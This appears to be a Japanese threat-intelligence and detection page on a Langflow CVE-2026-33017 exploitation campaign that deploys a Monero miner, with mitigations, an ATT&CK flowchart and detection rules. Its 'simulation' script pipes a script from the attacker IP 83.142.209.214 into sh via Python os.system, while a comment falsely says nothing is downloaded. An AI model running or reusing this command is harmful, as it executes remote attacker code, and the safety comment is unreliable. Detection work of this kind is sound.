CVE-2026-33017 暗号通貨マイニングキャンペーン:Langflow から Monero まで
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
仮想通貨マイニングキャンペーンが、Langflowにおける認証されていないリモートコード実行の脆弱性を悪用して、カスタマイズされたGoベースのマイナーを展開しています。この攻撃チェーンはbashスクリプトドロッパーを利用して持続性を確立し、再利用されたSSHキーを通じて横方向に移動します。マルウェアはホストレベルのセキュリティ対策を無効にし、競合するマイニングプロセスを終了させて利用可能なシステムリソースを最大化します。
調査
研究者は19日の期間にわたってこのキャンペーンを監視し、固定された flow_id と回転するユーザーエージェント文字列を含む一貫した攻撃パターンを特定しました。彼らの調査により、Goベースのバイナリ名 lambsys.elfを中心に構築された多段階の侵入が明らかになりました。これは、防御回避、ログの削除、ウォッチドッグによる持続性のために使用されました。ユーザー削除の行動と横方向移動の技術に基づいて、このツールチェーンはKORKERDSまたはMALXMRファミリーとの系譜を共有していると考えられています。
緩和策
組織は、リモートコード実行の問題を解消するため、Langflowをバージョン 1.9.0 またはそれ以上にアップグレードすべきです。また、Langflowのインスタンスをインターネットから公共にアクセス可能な状況にさらさないことを強く推奨し、過剰な権限でサービスを実行することを避けるべきです。追加のコントロールにより、公共のフローが認証されていない入力を受け付け、その結果コード実行を引き起こすことができないようにするべきです。
対応策
この活動が検出された場合、セキュリティチームはそれを仮想通貨マイニングの妥協としてだけでなく、SSHキーの露出の可能性のあるインシデントとしても扱うべきです。直ちに実施すべきステップには、潜在的に露出したすべてのSSHキーを更新し、横方向移動の兆候を示す接続されたホストを確認することが含まれます。また、チームは不正なアカウントの作成または削除を示すシステムログを監査し、承認されていないセキュリティ設定の変更がないかシステムを検査する必要があります。
"フローチャート TD step_reconnaissance["T1595.002 u2013 アクティブスキャニング: 脆弱性スキャニング: ユーザーエージェントの回転によるターゲットの指紋化とauto_login脆弱性の探索"] step_exploitation["T1210 u2013 リモートサービスのエクスプロイテーション: Langflow APIのCVE-2026-33017のPOSTリクエストによるエクスプロイト"] step_execution["T1059 u2013 実行: Python __import__('os').systemプリミティブによるシェルコマンドのトリガー"] step_ingress_transfer["T1105 u2013 イングレスツール転送: curlあるいはwgetによるisp.shドロッパーのダウンロード"] rules_for_ingress_transfer("<b>ルール名</b>: 標準ツールによるリモートファイルアップロード/ダウンロード(cmdline経由)<br/><b>ルールID</b>: 02cefb3e-acaa-42f6-8118-611e4162f3ba<hr/><b>ルール名</b>: 直接IPによる疑わしいファイルダウンロード(プロキシ経由)<br/><b>ルールID</b>: f0e46e70-111f-43a1-8853-d25f0b8683dd") step_persistence["T1053.003 u2013 持続性: crontabとbashループスクリプト(init_rmount)によるウォッチドッグ機能"] step_credential_access["T1552.004 u2013 資格情報アクセス: SSHプライベートキーの列挙とSSH_AUTH_SOCKのクエリ"] step_lateral_movement["T1021.004 u2013 横方向移動: SSHワーム機構によるknown_hostsのアクセス可能なホストの標的化"] step_defense_impairment["T1685 u2013 防御の劣化: ufw, iptables, AppArmor, SELinuxの無効化"] step_indicator_removal["T1070 u2013 インジケータ除去: /var/log/syslogの削除による調査の妨害"] step_command_and_control["T1102.003 u2013 指揮統制: lambsys.elfがHTTP POST経由で83.142.209.214にJSONハートビートを送信"] step_resource_hijacking["T1496.001 u2013 リソースハイジャック: コンピュートハイジャック: Moneroマイニング用のprocq (XMRig)の展開"] step_reconnaissance –>|leads_to| step_exploitation step_exploitation –>|enables| step_execution step_execution –>|initiates| step_ingress_transfer step_ingress_transfer -.->|detected_by| rules_for_ingress_transfer step_ingress_transfer –>|leads_to| step_persistence step_persistence –>|then| step_credential_access step_credential_access –>|enables| step_lateral_movement step_lateral_movement –>|leads_to| step_defense_impairment step_defense_impairment –>|then| step_indicator_removal step_indicator_removal –>|leads_to| step_command_and_control step_command_and_control –>|results_in| step_resource_hijacking "
攻撃フロー
検出
直接IPによる疑わしいファイルダウンロード(プロキシ経由)
表示
可能なIPルックアップドメイン通信の試行(dns経由)
表示
Chattrによる属性の変更 – Linux(cmdline経由)
表示
標準ツールによるリモートファイルアップロード/ダウンロード(cmdline経由)
表示
Linuxホストで隠しファイルが作成された(file_event経由)
表示
Langflowリモートコード実行エクスプロイト試行[ウェブサーバー]
表示
LangflowにおけるCVE-2026-33017仮想通貨マイナーのエクスプロイテーションの検出[Linuxプロセス作成]
表示
シミュレーション実行
前提条件: テレメトリーとベースラインのプリフライトチェックが合格していること。
根拠: このセクションでは、検出ルールをトリガーするために設計された敵のテクニック(TTP)の正確な実行を詳細に説明します。コマンドと説明は、識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目指さなければなりません。抽象的または無関連な例は誤診につながります。
-
攻撃の説明とコマンド: 攻撃者はLinuxサーバーで稼働している脆弱なLangflowインスタンスを特定します。CVE-2026-33017の脆弱性を利用して、攻撃者はリクエストに悪意のあるPythonペイロードを注入します。目的は、周囲の防御を回避し、Monero仮想通貨マイナーを展開することです。ペイロードはPythonの
os.systemを使用して/bin/shを呼び出し、その後攻撃者のインフラストラクチャ(isp.sh)からシェルスクリプト(83.142.209.214:8080)をダウンロードし、シェルに直接パイプして即座に実行します。 -
回帰テストスクリプト:
#!/bin/bash # Python注入によるCVE-2026-33017エクスプロイトのシミュレーション # このスクリプトは検出ルールが探している正確なコマンドラインを模倣します。 echo "[+] シミュレーション開始: CVE-2026-33017エクスプロイト" # 特定の文字列を実行するためにpython3を使います # 注意: 実際に何もダウンロードしていません。コマンド文字列を模倣しているだけです。 python3 -c "__import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh')" echo "[+] シミュレーションコマンド実行済み。" -
クリーンアップコマンド:
# シミュレーションスクリプトによって永続的な変更は行われていませんが、 # 作成されたダミーファイルがある場合は削除する必要があります。 echo "[+] シミュレーションの成果物をクリーンアップ中..." # (この特定のコマンドラインシミュレーションでは成果物が作成されていません)